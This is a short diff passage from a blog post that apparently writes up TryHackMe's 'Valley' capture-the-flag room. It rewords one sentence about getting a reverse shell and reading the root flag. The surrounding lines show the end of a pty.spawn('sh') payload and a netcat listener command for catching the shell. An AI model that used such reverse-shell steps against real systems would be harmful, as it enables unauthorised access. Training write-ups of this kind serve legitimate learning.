anthonyjsaab/beautiful-jekyll/_posts/2023-05-29-writeup-for-tryhackmes-valley-room.md

 pty.spawn("sh")
 ```

-After a minute, we get a reverse shell and can access the final flag!:
+After a minute, we get a reverse shell and can finally access the root flag!:
 ```text
 ┌──(kali㉿kali)-[~]
 └─$ nc -lvnp 9001